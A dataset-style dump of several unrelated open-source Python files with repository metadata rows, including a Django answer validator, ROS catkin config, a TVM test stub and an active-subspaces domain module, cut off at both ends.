def _require_listlike(level, arr, arrname: str):
"""
Ensure that level is either None or listlike, and arr is list-of-listlike.
"""
if level is not None and not is_list_like(level):
if not is_list_like(arr):
raise TypeError(f"{arrname} must be list-like")
if is_list_like(arr[0]):
raise TypeError(f"{arrname} must be list-like")
level = [level]
arr = [arr]
elif level is None or is_list_like(level):
if not is_list_like(arr) or not is_list_like(arr[0]):
raise TypeError(f"{arrname} must be list of lists-like")
return level, arr
| 34.359755 | 88 | 0.533148 |
a483ede61a9cc7a58b855d8bc24488c21b9c7142 | 194 | py | Python | tomaty/lib/utilities/date_utilities.py | nucle0tides/tomaty | 45eb0475f9e9635a6aa2fe41606e4d2fb6403101 | [
"MIT"
] | 5 | 2018-03-29T16:27:36.000Z | 2020-06-14T15:19:19.000Z | tomaty/lib/utilities/date_utilities.py | nucle0tides/tomaty | 45eb0475f9e9635a6aa2fe41606e4d2fb6403101 | [
"MIT"
] | 29 | 2018-03-29T16:29:43.000Z | 2018-04-24T02:03:13.000Z | tomaty/lib/utilities/date_utilities.py | nucle0tides/tomaty | 45eb0475f9e9635a6aa2fe41606e4d2fb6403101 | [
"MIT"
] | 2 | 2018-03-29T16:27:39.000Z | 2018-03-29T20:42:03.000Z | from datetime import timedelta, datetime
def string_to_timedelta(datestr):
t = datetime.strptime(datestr, '%H:%M:%S')
return timedelta(hours=t.hour, minutes=t.minute, seconds=t.second)
| 32.333333 | 70 | 0.742268 |
b1de9ec75221cc1a4a1a4719d1bdec58a6cc349b | 917 | py | Python | tests/python/contrib/test_hexagon/test_relax_integration.py | octoml/relax | 41f14415ba28d62e155b75ea2c740b25213a9970 | [
"Apache-2.0"
] | 11 | 2021-11-02T00:49:16.000Z | 2021-11-19T02:17:00.000Z | tests/python/contrib/test_hexagon/test_relax_integration.py | octoml/relax | 41f14415ba28d62e155b75ea2c740b25213a9970 | [
"Apache-2.0"
] | 16 | 2021-11-02T00:17:12.000Z | 2021-11-21T20:47:52.000Z | tests/python/contrib/test_hexagon/test_relax_integration.py | octoml/relax | 41f14415ba28d62e155b75ea2c740b25213a9970 | [
"Apache-2.0"
] | 4 | 2021-11-05T18:17:23.000Z | 2021-11-11T06:22:00.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm.testing
@tvm.testing.requires_hexagon
def test_simple():
    # Placeholder smoke test: skipped unless a Hexagon device/toolchain is
    # available; passing only asserts the test scaffolding imports cleanly.
    pass


if __name__ == "__main__":
    tvm.testing.main()
| 32.75 | 62 | 0.762268 |
2249eabccebce6f55538df48e6f4d43054666f25 | 580 | py | Python | build/wiimote_state_estimation/catkin_generated/pkg.develspace.context.pc.py | odinase/roswiimote | b3a9b4c18a1598f8cf4399e038d1cddd06954063 | [
"MIT"
] | null | null | null | build/wiimote_state_estimation/catkin_generated/pkg.develspace.context.pc.py | odinase/roswiimote | b3a9b4c18a1598f8cf4399e038d1cddd06954063 | [
"MIT"
] | null | null | null | build/wiimote_state_estimation/catkin_generated/pkg.develspace.context.pc.py | odinase/roswiimote | b3a9b4c18a1598f8cf4399e038d1cddd06954063 | [
"MIT"
] | null | null | null | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/odin/ros_testing/roswiimote/src/wiimote_state_estimation/include".split(';') if "/home/odin/ros_testing/roswiimote/src/wiimote_state_estimation/include" != "" else []
PROJECT_CATKIN_DEPENDS = "message_runtime;roscpp;std_msgs;sensor_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "wiimote_state_estimation"
PROJECT_SPACE_DIR = "/home/odin/ros_testing/roswiimote/devel"
PROJECT_VERSION = "0.0.0"
| 64.444444 | 207 | 0.77931 |
588a39493e74947f33f29aab4a6a3325dd634be6 | 4,572 | py | Python | moocng/api/validation.py | OpenMOOC/moocng | 1e3dafb84aa1838c881df0c9bcca069e47c7f52d | [
"Apache-2.0"
] | 36 | 2015-01-10T06:00:36.000Z | 2020-03-19T10:06:59.000Z | moocng/api/validation.py | OpenMOOC/moocng | 1e3dafb84aa1838c881df0c9bcca069e47c7f52d | [
"Apache-2.0"
] | 3 | 2015-10-01T17:59:32.000Z | 2018-09-04T03:32:17.000Z | moocng/api/validation.py | OpenMOOC/moocng | 1e3dafb84aa1838c881df0c9bcca069e47c7f52d | [
"Apache-2.0"
] | 17 | 2015-01-13T03:46:58.000Z | 2020-07-05T06:29:51.000Z | # -*- coding: utf-8 -*-
# Copyright 2012-2013 UNED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cgi import escape
from datetime import datetime
import logging
from django.conf import settings
from django.core.exceptions import ValidationError
from tastypie.validation import Validation
from moocng.courses.models import Question, Option
from moocng.mongodb import get_db
logger = logging.getLogger(__name__)
def answer_validate_date(bundle, request=None):
    """Validate that an answer arrives before its unit's deadline.

    Raises ValidationError when question_id is missing or when the unit's
    deadline (for deadline-bearing unit types) has passed; otherwise returns
    an empty error dict.
    """
    question_id = bundle.data.get("question_id", None)
    if question_id is None:
        raise ValidationError("question_id is required")

    question = Question.objects.get(id=question_id)
    unit = question.kq.unit
    # NOTE(review): unittype 'n' appears to mean "no deadline applies" —
    # confirm against the courses app's Unit model.
    if (unit.unittype != 'n' and unit.deadline and
            datetime.now(unit.deadline.tzinfo) > unit.deadline):
        raise ValidationError("Unit's deadline is exceed")
    return {}
class AnswerValidation(Validation):
    """Tastypie validation for student answer submissions.

    Checks that the submission arrives before the unit's deadline and that
    every reply value matches the type its option expects ('t' -> text,
    'c'/'r' -> boolean).
    """

    def _gen_message(self, username, reply, should_be):
        # Build the error/log message for a reply of the wrong value type.
        # Fixed broken grammar: was "... is should be %s but is %s".
        return 'Reply from user %s for option %s should be %s but is %s' % (
            username, reply['option'], should_be,
            escape(unicode(type(reply['value']))))

    def is_valid(self, bundle, request=None):
        """Aggregate the date and reply-list validation errors."""
        errors = {}
        errors.update(self.validate_date(bundle, request))
        errors.update(self.validate_replyList(bundle, request))
        return errors

    def validate_date(self, bundle, request=None):
        # Deadline check is shared with other validators via the module helper.
        return answer_validate_date(bundle, request)

    def validate_replyList(self, bundle, request=None):
        """Validate the structure and value types of the replyList payload."""
        questionID = bundle.data.get("question_id", None)
        replyList = bundle.data.get("replyList", None)
        if (replyList is None or not isinstance(replyList, list) or
                len(replyList) == 0):
            msg = "replyList is empty or isn't a list"
            logger.error(msg)
            raise ValidationError(msg)
        if (questionID is not None) and (len(bundle.data['replyList']) > 0):
            try:
                question = Question.objects.get(id=questionID)
                for reply in bundle.data['replyList']:
                    option = question.option_set.get(id=reply['option'])
                    msg = None
                    # 't' options expect text; 'c'/'r' expect booleans
                    if (option.optiontype == 't') and (not isinstance(reply['value'], basestring)):
                        msg = self._gen_message(request.user.username, reply, 'text')
                    elif (option.optiontype in ['c', 'r']) and (not isinstance(reply['value'], bool)):
                        msg = self._gen_message(request.user.username, reply, 'boolean')
                    if msg is not None:
                        logger.error(msg)
                        raise ValidationError(msg)
            except Question.DoesNotExist:
                msg = 'Question %s does not exist' % questionID
                logger.error(msg)
                raise ValidationError(msg)
            except Option.DoesNotExist:
                msg = 'Option %s does not exist' % reply['option']
                logger.error(msg)
                raise ValidationError(msg)
        return {}
class PeerReviewSubmissionsResourceValidation(Validation):
    """Tastypie validation for peer-review submissions.

    Rejects duplicate submissions for the same knowledge quantum by the same
    author and enforces the configured maximum text length.
    """

    def is_valid(self, bundle, request):
        if not bundle.data or not ("kq" in bundle.data):
            return {'__all__': 'Expected kq id'}

        errors = {}

        # one submission per (kq, author) pair, stored in MongoDB
        db = get_db()
        collection = db.get_collection("peer_review_submissions")
        exists = collection.find({
            "kq": bundle.data["kq"],
            "author": unicode(request.user.id)
        })
        if exists.count() > 0:
            msg = "Already exists a submission for kq=%s and user=%s" % (
                bundle.data["kq"],
                request.user.id)
            logger.error(msg)
            errors["kq"] = [msg]
            errors["author"] = [msg]

        text = bundle.data.get("text", "")
        max_text_leng = getattr(settings, "PEER_REVIEW_TEXT_MAX_SIZE", 5000)
        if len(text) > max_text_leng:
            errors["text"] = "Text is longer than %s chars" % max_text_leng
        return errors
| 35.44186 | 102 | 0.617892 |
bcc3b7039c50d47b9d7189eb36868a920c150ea4 | 20,305 | py | Python | active_subspaces/domains.py | carlosal1015/active_subspaces | caaf108fcb89548a374fea7704b0d92d38b4539a | [
"MIT"
] | 1 | 2020-03-16T18:05:05.000Z | 2020-03-16T18:05:05.000Z | active_subspaces/domains.py | carlosal1015/active_subspaces | caaf108fcb89548a374fea7704b0d92d38b4539a | [
"MIT"
] | null | null | null | active_subspaces/domains.py | carlosal1015/active_subspaces | caaf108fcb89548a374fea7704b0d92d38b4539a | [
"MIT"
] | 1 | 2020-03-16T18:05:09.000Z | 2020-03-16T18:05:09.000Z | """Utilities for building the domains and maps for active variables."""
import numpy as np
import logging
from utils.misc import process_inputs, BoundedNormalizer
from scipy.spatial import ConvexHull
from scipy.misc import comb
from utils.qp_solver import QPSolver
from subspaces import Subspaces
class ActiveVariableDomain():
    """
    A base class for the domain of functions of active variables.

    :cvar Subspaces subspaces: a Subspaces object.
    :cvar int m: The dimension of the simulation inputs.
    :cvar int n: The dimension of the active subspace.
    :cvar ndarray vertY: An ndarray that contains n-dimensional vertices that
        define the boundary of the domain when the m-dimensional space is
        bounded by a hypercube.
    :cvar ndarray vertX: An ndarray of the corners of the m-dimensional
        hypercube that map to the points `vertY`.
    :cvar scipy.spatial.ConvexHull convhull: The ConvexHull object defined by
        the vertices `vertY`.
    :cvar dict constraints: A dictionary of linear inequality constraints
        conforming to the specifications used in the scipy.optimizer library.

    **Notes**

    Attributes `vertY`, `vertX`, `convhull`, and `constraints` are None when the
    m-dimensional parameter space is unbounded.
    """
    # Populated by subclass __init__ (and compute_boundary for bounded domains).
    subspaces = None
    m, n = None, None
    vertY, vertX = None, None
    convhull, constraints = None, None
class UnboundedActiveVariableDomain(ActiveVariableDomain):
    """
    An class for the domain of functions of active variables when the space
    of simulation parameters is unbounded.

    **Notes**

    Using this class assumes that the space of simulation inputs is equipped
    with a Gaussian weight function.
    """
    def __init__(self, subspaces):
        """
        Initialize the UnboundedActiveVariableDomain.

        :param Subspaces subspaces: A Subspaces object with the `compute`
            method already called.
        """
        if not isinstance(subspaces, Subspaces):
            raise TypeError('subspaces should be a Subspaces object.')

        if subspaces.W1 is None:
            raise ValueError('The given subspaces has not been computed.')

        self.subspaces = subspaces
        # W1 is m-by-n: m input dimensions, n active dimensions
        self.m, self.n = subspaces.W1.shape
class BoundedActiveVariableDomain(ActiveVariableDomain):
    """
    An class for the domain of functions of active variables when the space
    of simulation parameters is bounded.

    **Notes**

    Using this class assumes that the space of simulation inputs is equipped
    with a uniform weight function. And the space itself is a hypercube.
    """

    def __init__(self, subspaces):
        """
        Initialize the BoundedActiveVariableDomain.

        :param Subspaces subspaces: A Subspaces object with the `compute`
            method already called.
        """
        if not isinstance(subspaces, Subspaces):
            raise TypeError('subspaces should be a Subspaces object.')

        if subspaces.W1 is None:
            raise ValueError('The given subspaces has not been computed.')

        self.subspaces = subspaces
        self.m, self.n = subspaces.W1.shape
        self.compute_boundary()

    def compute_boundary(self):
        """
        Compute and set the boundary of the domain.

        **Notes**

        This function computes the boundary of the active variable range, i.e.,
        the domain of a function of the active variables, and it sets the
        attributes to the computed components. It is called when the
        BoundedActiveVariableDomain is initialized. If the dimension of the
        active subspaces is manually changed, then this function must be called
        again to recompute the boundary of the domain.
        """
        W1 = self.subspaces.W1
        m, n = W1.shape

        if n == 1:
            # 1-d active subspace: the range is just an interval
            Y, X = interval_endpoints(W1)
            convhull = None
            constraints = None
        else:
            # n > 1: the range is a zonotope; represent it by its convex hull
            Y, X = zonotope_vertices(W1)
            convhull = ConvexHull(Y)
            # hull facets give the linear inequality constraints A y <= b
            A = convhull.equations[:,:n]
            b = convhull.equations[:,n]
            constraints = ({'type' : 'ineq',
                        'fun' : lambda x: np.dot(A, x) - b,
                        'jac' : lambda x: A})

        # store variables
        self.vertY, self.vertX = Y, X
        self.convhull, self.constraints = convhull, constraints
class ActiveVariableMap():
    """
    A base class for the map between active/inactive and original variables.

    :cvar ActiveVariableDomain domain: An ActiveVariableDomain object.

    **See Also**

    domains.UnboundedActiveVariableMap
    domains.BoundedActiveVariableMap
    """
    domain = None

    def __init__(self, domain):
        """
        Initialize the ActiveVariableMap.

        :param ActiveVariableDomain domain: An ActiveVariableDomain object.
        """
        self.domain = domain

    def forward(self, X):
        """
        Map the points in the original input space to the active and inactive
        variables.

        :param ndarray X: An M-by-m matrix. Each row of `X` is a point in the
            original parameter space

        :return: Y, M-by-n matrix that contains points in the space of active
            variables. Each row of `Y` corresponds to a row of `X`.
        :rtype: ndarray

        :return: Z, M-by-(m-n) matrix that contains points in the space of
            inactive variables. Each row of `Z` corresponds to a row of `X`.
        :rtype: ndarray
        """
        X = process_inputs(X)[0]
        W1, W2 = self.domain.subspaces.W1, self.domain.subspaces.W2
        # project onto the active (W1) and inactive (W2) subspaces
        Y, Z = np.dot(X, W1), np.dot(X, W2)
        return Y, Z

    def inverse(self, Y, N=1):
        """
        Map the points in the active variable space to the original parameter
        space.

        :param ndarray Y: M-by-n matrix that contains points in the space
            of active variables.
        :param int N: The number of points in the original parameter space
            that are returned that map to the given active variables.

        :return: X, (M*N)-by-m matrix that contains points in the original
            parameter space.
        :rtype: ndarray

        :return: ind, (M*N)-by-1 matrix that contains integer indices. These
            indices identify which rows of `X` map to which rows of `Y`.
        :rtype: ndarray

        **Notes**

        The inverse map depends critically on the `regularize_z` function.
        """
        # check inputs
        Y, NY, n = process_inputs(Y)

        if not isinstance(N, int):
            raise TypeError('N must be an int')

        logging.getLogger(__name__).debug('Inverting {:d} y\'s with {:d} z\'s per y.'.format(NY, N))

        # pick inactive-variable values, then rotate back to x-space
        Z = self.regularize_z(Y, N)
        W = self.domain.subspaces.eigenvectors
        X, ind = _rotate_x(Y, Z, W)
        return X, ind

    def regularize_z(self, Y, N):
        """
        Find points in the space of inactive variables to complete the inverse
        map.

        :param ndarray Y: M-by-n matrix that contains points in the space of
            active variables.
        :param int N: The number of points in the original parameter space that
            are returned that map to the given active variables.

        :return: Z, (M)-by-(m-n)-by-N matrix that contains values of the
            inactive variables.
        :rtype: ndarray

        **Notes**

        The base class does not implement `regularize_z`. Specific
        implementations depend on whether the original variables are bounded or
        unbounded. They also depend on what the weight function is on the
        original parameter space.
        """
        raise NotImplementedError()
class BoundedActiveVariableMap(ActiveVariableMap):
    """
    A class for the map between active/inactive and original variables when
    the original variables are bounded by a hypercube with a uniform density.

    **See Also**

    domains.UnboundedActiveVariableMap
    """
    def regularize_z(self, Y, N):
        """
        Find points in the space of inactive variables to complete the
        inverse map.

        :param ndarray Y: M-by-n matrix that contains points in the space of
            active variables.
        :param int N: The number of points in the original parameter space
            that are returned that map to the given active variables.
        :return: Z, (M)-by-(m-n)-by-N matrix that contains values of the
            inactive variables.
        :rtype: ndarray

        **Notes**

        This implementation uses `sample_z` to randomly sample values of the
        inactive variables that complement the given values of the active
        variables.
        """
        W1, W2 = self.domain.subspaces.W1, self.domain.subspaces.W2
        # sample_z returns an N-by-(m-n) array per active point; stack them
        # and swap axes to get the documented (M)-by-(m-n)-by-N layout
        Zlist = [sample_z(N, y, W1, W2) for y in Y]
        return np.swapaxes(np.array(Zlist), 1, 2)
class UnboundedActiveVariableMap(ActiveVariableMap):
    """
    A class for the map between active/inactive and original variables when
    the original variables are unbounded and the space is equipped with a
    standard Gaussian density.

    **See Also**

    domains.BoundedActiveVariableMap
    """
    def regularize_z(self, Y, N):
        """
        Find points in the space of inactive variables to complete the
        inverse map.

        :param ndarray Y: M-by-n matrix that contains points in the space of
            active variables.
        :param int N: The number of points in the original parameter space
            that are returned that map to the given active variables.
        :return: Z, (M)-by-(m-n)-by-N matrix that contains values of the
            inactive variables.
        :rtype: ndarray

        **Notes**

        Samples the inactive variables from a standard (m-n)-variate Gaussian
        distribution.
        """
        m, n = self.domain.subspaces.W1.shape
        num_points = Y.shape[0]
        return np.random.normal(size=(num_points, m - n, N))
def nzv(m, n):
    """
    Compute the number of zonotope vertices for a linear map from R^m to R^n.

    :param int m: The dimension of the hypercube.
    :param int n: The dimension of the low-dimensional subspace.
    :return: N, the number of vertices defining the zonotope.
    :rtype: int

    **Notes**

    The original docstring advertised a second return value `M`; the function
    has only ever returned the single integer count.
    """
    if not isinstance(m, int):
        raise TypeError('m should be an integer.')
    if not isinstance(n, int):
        raise TypeError('n should be an integer.')
    # classical count: N = 2 * sum_{i=0}^{n-1} C(m-1, i)
    N = 2 * sum(comb(m - 1, i) for i in range(n))
    return int(N)
def interval_endpoints(W1):
    """
    Compute the range of a 1d active variable.

    :param ndarray W1: m-by-1 matrix that contains the eigenvector defining
        the first active variable.
    :return: Y, 2-by-1 matrix that contains the endpoints of the interval
        defining the range of the 1d active variable.
    :rtype: ndarray
    :return: X, 2-by-m matrix that contains the corners of the m-dimensional
        hypercube that map to the active variable endpoints.
    :rtype: ndarray
    """
    logging.getLogger(__name__).debug('Interval domain.')
    m = W1.shape[0]
    # the extreme corner is the sign pattern of the eigenvector
    corner = np.sign(W1)
    y0 = np.dot(W1.T, corner)[0]
    # order the endpoints so the lower one comes first
    if y0 < -y0:
        yl, yu, xl, xu = y0, -y0, corner, -corner
    else:
        yl, yu, xl, xu = -y0, y0, -corner, corner
    Y = np.array([yl, yu]).reshape((2, 1))
    X = np.vstack((xl.reshape((1, m)), xu.reshape((1, m))))
    return Y, X
def unique_rows(S):
    """
    Return the unique rows from S.

    Each row is viewed as a single opaque (void) element so that np.unique
    can compare whole rows at once, following
    http://stackoverflow.com/questions/16970982/find-unique-rows-in-numpy-array
    """
    row_dtype = np.dtype((np.void, S.dtype.itemsize * S.shape[1]))
    packed = np.unique(S.view(row_dtype))
    return packed.view(S.dtype).reshape(-1, S.shape[1])
def zonotope_vertices(W1, Nsamples=1e4, maxcount=1e5):
    """
    Compute the vertices of the zonotope.

    :param ndarray W1: m-by-n matrix that contains the eigenvector bases of
        the n-dimensional active subspace.
    :param int Nsamples: number of random directions drawn per search round.
    :param int maxcount: maximum number of extra search rounds before giving
        up on finding every vertex.
    :return: Y, nzv-by-n matrix that contains the zonotope vertices.
    :rtype: ndarray
    :return: X, nzv-by-m matrix that contains the corners of the
        m-dimensional hypercube that map to the zonotope vertices.
    :rtype: ndarray
    """
    # defaults are float literals (1e4/1e5); numpy requires integer sizes
    Nsamples = int(Nsamples)
    m, n = W1.shape
    totalverts = nzv(m, n)
    logging.getLogger(__name__).debug('Zonotope domain in {:d} dims with {:d} vertices.'.format(n, totalverts))
    # each random direction picks out the hypercube corner maximizing it,
    # which maps to a zonotope vertex; corners come in +/- pairs
    Z = np.random.normal(size=(Nsamples, n))
    X = unique_rows(np.sign(np.dot(Z, W1.transpose())))
    X = unique_rows(np.vstack((X, -X)))
    N = X.shape[0]
    count = 0
    # keep sampling until all vertices are found or the round budget runs out
    while N < totalverts:
        Z = np.random.normal(size=(Nsamples, n))
        X0 = unique_rows(np.sign(np.dot(Z, W1.transpose())))
        X0 = unique_rows(np.vstack((X0, -X0)))
        X = unique_rows(np.vstack((X, X0)))
        N = X.shape[0]
        count += 1
        if count > maxcount:
            break
    numverts = X.shape[0]
    if totalverts > numverts:
        # print() is valid in both Python 2 and 3; the original used the
        # Python-2-only print statement
        print('Warning: {} of {} vertices found.'.format(numverts, totalverts))
    Y = np.dot(X, W1)
    return Y.reshape((numverts, n)), X.reshape((numverts, m))
def sample_z(N, y, W1, W2):
    """
    Sample values of the inactive variables for a fixed value of the active
    variables when the original variables are bounded by a hypercube.

    :param int N: The number of inactive variable samples.
    :param ndarray y: The value of the active variables.
    :param ndarray W1: m-by-n matrix that contains the eigenvector bases of
        the n-dimensional active subspace.
    :param ndarray W2: m-by-(m-n) matrix that contains the eigenvector bases
        of the (m-n)-dimensional inactive subspace.
    :return: Z, N-by-(m-n) matrix that contains values of the inactive
        variables that correspond to the given `y`.
    :rtype: ndarray

    **Notes**

    We must draw z so that -1 <= W1*y + W2*z <= 1, i.e. so that z respects
    the linear inequalities W2*z <= 1 - W1*y and -W2*z <= 1 + W1*y, which
    define a polytope in R^(m-n). A simple rejection sampling scheme is
    tried first (bounding hyperbox, uniform draws, reject outsiders); if it
    does not return enough samples, a "hit and run" sampler is used instead.
    As a last resort that sampler returns copies of a feasible Chebyshev
    center point. Thanks to David Gleich for showing me Chebyshev centers.
    """
    if not isinstance(N, int):
        raise TypeError('N should be an integer.')
    # cheap method first, robust method as a fallback
    samples = rejection_sampling_z(N, y, W1, W2)
    if samples is None:
        logging.getLogger(__name__).warn('Rejection sampling has failed miserably. Will try hit and run sampling.')
        samples = hit_and_run_z(N, y, W1, W2)
    return samples
def hit_and_run_z(N, y, W1, W2):
    """
    A hit and run method for sampling the inactive variables from a polytope.

    :param int N: the number of inactive variable samples.
    :param ndarray y: the value of the active variables.
    :param ndarray W1: m-by-n matrix of active-subspace eigenvector bases.
    :param ndarray W2: m-by-(m-n) matrix of inactive-subspace eigenvector
        bases.
    :return: Z, N-by-(m-n) matrix of inactive-variable samples satisfying
        -1 <= W1*y + W2*z <= 1.
    :rtype: ndarray

    **See Also**

    domains.sample_z
    """
    m, n = W1.shape
    # get an initial feasible point using the Chebyshev center. huge props to
    # David Gleich for showing me the Chebyshev center.
    s = np.dot(W1, y).reshape((m, 1))
    normW2 = np.sqrt( np.sum( np.power(W2, 2), axis=1 ) ).reshape((m,1))
    # NOTE(review): QPSolver is a project-local LP/QP wrapper; assumed here to
    # return the maximizer of the Chebyshev-center LP — confirm against qp_solver
    A = np.hstack(( np.vstack((W2, -W2.copy())), np.vstack((normW2, normW2.copy())) ))
    b = np.vstack((1-s, 1+s)).reshape((2*m, 1))
    c = np.zeros((m-n+1,1))
    c[-1] = -1.0
    qps = QPSolver()
    zc = qps.linear_program_ineq(c, -A, -b)
    # drop the radius component; keep the center as the starting point
    z0 = zc[:-1].reshape((m-n, 1))
    # define the polytope A >= b
    s = np.dot(W1, y).reshape((m, 1))
    A = np.vstack((W2, -W2))
    b = np.vstack((-1-s, -1+s)).reshape((2*m, 1))
    # tolerance
    ztol = 1e-6
    eps0 = ztol/4.0
    Z = np.zeros((N, m-n))
    for i in range(N):
        # random direction
        bad_dir = True
        count, maxcount = 0, 50
        while bad_dir:
            d = np.random.normal(size=(m-n,1))
            # a direction is "bad" if a tiny step along it already leaves the polytope
            bad_dir = np.any(np.dot(A, z0 + eps0*d) <= b)
            count += 1
            if count >= maxcount:
                # give up: pad the remaining rows with copies of the current point
                logging.getLogger(__name__).warn('There are no more directions worth pursuing in hit and run. Got {:d} samples.'.format(i))
                Z[i:,:] = np.tile(z0, (1,N-i)).transpose()
                return Z
        # find constraints that impose lower and upper bounds on eps
        f, g = b - np.dot(A,z0), np.dot(A, d)
        # find an upper bound on the step
        min_ind = np.logical_and(g<=0, f < -np.sqrt(np.finfo(np.float).eps))
        eps_max = np.amin(f[min_ind]/g[min_ind])
        # find a lower bound on the step
        max_ind = np.logical_and(g>0, f < -np.sqrt(np.finfo(np.float).eps))
        eps_min = np.amax(f[max_ind]/g[max_ind])
        # randomly sample eps
        eps1 = np.random.uniform(eps_min, eps_max)
        # take a step along d
        z1 = z0 + eps1*d
        Z[i,:] = z1.reshape((m-n, ))
        # update temp var
        z0 = z1.copy()
    return Z
def rejection_sampling_z(N, y, W1, W2):
    """
    A rejection sampling method for sampling the inactive variables from a
    polytope.

    :param int N: the number of inactive variable samples.
    :param ndarray y: the value of the active variables.
    :param ndarray W1: m-by-n matrix of active-subspace eigenvector bases.
    :param ndarray W2: m-by-(m-n) matrix of inactive-subspace eigenvector
        bases.
    :return: Z, N-by-(m-n) matrix of samples, or None when fewer than N of
        the 50*N uniform box draws landed inside the polytope.
    :rtype: ndarray or None

    **See Also**

    domains.sample_z
    """
    m, n = W1.shape
    s = np.dot(W1, y).reshape((m, 1))
    # Build a box around z for uniform sampling
    # NOTE(review): QPSolver/BoundedNormalizer are project-local helpers;
    # each LP below is assumed to return the polytope's extreme coordinate
    # along one axis — confirm against their implementations
    qps = QPSolver()
    A = np.vstack((W2, -W2))
    b = np.vstack((-1-s, -1+s)).reshape((2*m, 1))
    lbox, ubox = np.zeros((1,m-n)), np.zeros((1,m-n))
    for i in range(m-n):
        clb = np.zeros((m-n,1))
        clb[i,0] = 1.0
        lbox[0,i] = qps.linear_program_ineq(clb, A, b)[i,0]
        cub = np.zeros((m-n,1))
        cub[i,0] = -1.0
        ubox[0,i] = qps.linear_program_ineq(cub, A, b)[i,0]
    bn = BoundedNormalizer(lbox, ubox)
    # draw 50x the requested count uniformly in the bounding box
    Zbox = bn.unnormalize(np.random.uniform(-1.0,1.0,size=(50*N,m-n)))
    # keep only the draws that satisfy every polytope inequality
    ind = np.all(np.dot(A, Zbox.T) >= b, axis=0)
    if np.sum(ind) >= N:
        Z = Zbox[ind,:]
        return Z[:N,:].reshape((N,m-n))
    else:
        return None
def random_walk_z(N, y, W1, W2):
    """
    A random walk method for sampling the inactive variables from a polytope.

    :param int N: the number of inactive variable samples.
    :param ndarray y: the value of the active variables.
    :param ndarray W1: m-by-n matrix of active-subspace eigenvector bases.
    :param ndarray W2: m-by-(m-n) matrix of inactive-subspace eigenvector
        bases.
    :return: Z, N-by-(m-n) matrix of inactive-variable samples.
    :rtype: ndarray

    **See Also**

    domains.sample_z
    """
    m, n = W1.shape
    s = np.dot(W1, y).reshape((m, 1))
    # linear program to get starting z0
    # (z = 0 is used directly when it is already feasible)
    if np.all(np.zeros((m, 1)) <= 1-s) and np.all(np.zeros((m, 1)) >= -1-s):
        z0 = np.zeros((m-n, 1))
    else:
        # NOTE(review): QPSolver is a project-local LP wrapper — assumed to
        # return a feasible x with W1.T x = y inside the hypercube; confirm
        qps = QPSolver()
        lb = -np.ones((m,1))
        ub = np.ones((m,1))
        c = np.zeros((m,1))
        x0 = qps.linear_program_eq(c, W1.T, y.reshape((n,1)), lb, ub)
        z0 = np.dot(W2.T, x0).reshape((m-n, 1))
    # get MCMC step size
    sig = 0.1*np.minimum(
        np.linalg.norm(np.dot(W2, z0) + s - 1),
        np.linalg.norm(np.dot(W2, z0) + s + 1))
    # burn in
    for i in range(10*N):
        zc = z0 + sig*np.random.normal(size=z0.shape)
        if np.all(np.dot(W2, zc) <= 1-s) and np.all(np.dot(W2, zc) >= -1-s):
            z0 = zc
    # sample
    # (rejected proposals repeat the previous point, as in Metropolis sampling)
    Z = np.zeros((m-n, N))
    for i in range(N):
        zc = z0 + sig*np.random.normal(size=z0.shape)
        if np.all(np.dot(W2, zc) <= 1-s) and np.all(np.dot(W2, zc) >= -1-s):
            z0 = zc
        Z[:,i] = z0.reshape((z0.shape[0], ))
    return Z.reshape((N, m-n))
def _rotate_x(Y, Z, W):
    """
    Combine active and inactive coordinates and rotate them back to the
    original parameter space.

    :param ndarray Y: NY-by-n matrix of active-variable points.
    :param ndarray Z: NY-by-(m-n)-by-N matrix of inactive-variable samples.
    :param ndarray W: m-by-m orthogonal eigenvector matrix.
    :return: X, (N*NY)-by-m matrix of original-space points, and ind, an
        (N*NY)-by-1 matrix mapping each row of X to its row of Y.
    """
    NY, n = Y.shape
    N = Z.shape[2]
    m = n + Z.shape[1]
    # replicate each active point N times so it pairs with its N z-samples
    active = np.tile(Y.reshape((NY, n, 1)), (1, 1, N))
    stacked = np.concatenate((active, Z), axis=1)
    yz = stacked.transpose((1, 0, 2)).reshape((m, N * NY)).transpose((1, 0))
    X = np.dot(yz, W.T).reshape((N * NY, m))
    # row i*N..(i+1)*N-1 of X all come from row i of Y
    ind = np.kron(np.arange(NY), np.ones(N)).reshape((N * NY, 1))
    return X, ind
| 32.802908 | 139 | 0.611918 |
6d76e5ff0e17889908d0167a4c701c5a35efa948 | 5,798 | py | Python | spec/clean/wrapper_spec.py | slavad/py-series-clean | 2a7cbd0cec1a46374e49eae79e6a88afb31ca54a | [
"MIT"
] | null | null | null | spec/clean/wrapper_spec.py | slavad/py-series-clean | 2a7cbd0cec1a46374e49eae79e6a88afb31ca54a | [
"MIT"
] | null | null | null | spec/clean/wrapper_spec.py | slavad/py-series-clean | 2a7cbd0cec1a46374e49eae79e6a88afb31ca54a | [
"MIT"
] | null | null | null | from spec.spec_helper import *
import clean.wrapper as wrp
# mamba BDD-style spec for clean.wrapper.Wrapper; the expected arrays were
# recorded from a known-good run and stored as pickled fixtures.
with description(wrp.Wrapper) as self:
    with before.all:
        self.use_aver = False
        self.round_precision = 10
        self.khi = 4
        self.detection_treshold = 0.3
        self.harmonic_share = 0.5
        self.max_iterations = 10
        # input series fixtures shared by every example
        self.time_grid = np.load("./spec/fixtures/unit/time_grid_1.pickle")
        self.values = np.load("./spec/fixtures/unit/series_1.pickle")
